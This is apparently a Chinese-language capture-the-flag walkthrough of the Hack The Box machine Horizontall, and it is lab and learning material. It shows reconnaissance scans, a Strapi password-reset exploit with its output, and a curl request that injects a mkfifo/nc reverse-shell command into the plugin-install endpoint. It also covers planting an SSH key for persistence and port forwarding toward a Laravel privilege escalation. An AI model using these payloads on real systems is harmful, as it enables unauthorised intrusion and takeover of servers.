基本信息

端口扫描

22和80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV 10.10.11.105

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-01 14:04 CST
Nmap scan report for 10.10.11.105
Host is up (0.073s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

80

需要加hosts:

1
10.10.11.105 horizontall.htb

子域名

需要一个大字典扫描,得到api-prod.horizontall.htb:

1
2
3
gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u horizontall.htb

Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

api-prod.horizontall.htb

目录扫描

常规目录扫描:

1
2
3
4
5
6
7
8
9
10
gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/Admin                (Status: 200) [Size: 854]
/ADMIN                (Status: 200) [Size: 854]
/admin                (Status: 200) [Size: 854]
/favicon.ico          (Status: 200) [Size: 1150]
/index.html           (Status: 200) [Size: 413]
/robots.txt           (Status: 200) [Size: 121]
/reviews              (Status: 200) [Size: 507]
/users                (Status: 403) [Size: 60]

admin

Strapi:

Strapi

可以搜到相关漏洞:

reset password

账号简单猜测admin@horizontall.htb,重置密码登录:

1
2
3
4
5
6
7
8
9
curl http://api-prod.horizontall.htb/admin/strapiVersion
{"strapiVersion":"3.0.0-beta.17.4"}

python3 strapi.py admin@horizontall.htb http://api-prod.horizontall.htb miaomiao
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
b'{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDc3MDQ3LCJleHAiOjE2MzMwNjkwNDd9.VncxiviJLdAYIYqUOZXNBr6QnwM_8j8qmsPxH6zYl3s","user":{"id":3,"username":"admin","email":"admin@horizontall.htb","blocked":null}}'

RCE

JWT就是前面重置密码得到的,另外content-length小问题,可以转到burp里修复后重放,getshell:

1
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDc3MDQ3LCJleHAiOjE2MzMwNjkwNDd9.VncxiviJLdAYIYqUOZXNBr6QnwM_8j8qmsPxH6zYl3s' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f)\",\"port\":\"1337\"}' $'http://api-prod.horizontall.htb/admin/plugins/install' --proxy http://127.0.0.1:8087

写公钥方便后续操作:

1
2
3
4
cd ~
mkdir .ssh
cd .ssh
echo "xxxx" > authorized_keys

user flag

user.txt在develpoer目录中,strapi用户有权限读取:

提权信息

可以发现本地8000端口,转发查看:

1
ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105

Laravel,搜到相关漏洞:

提权 & root flag

exp一键打:

参考资料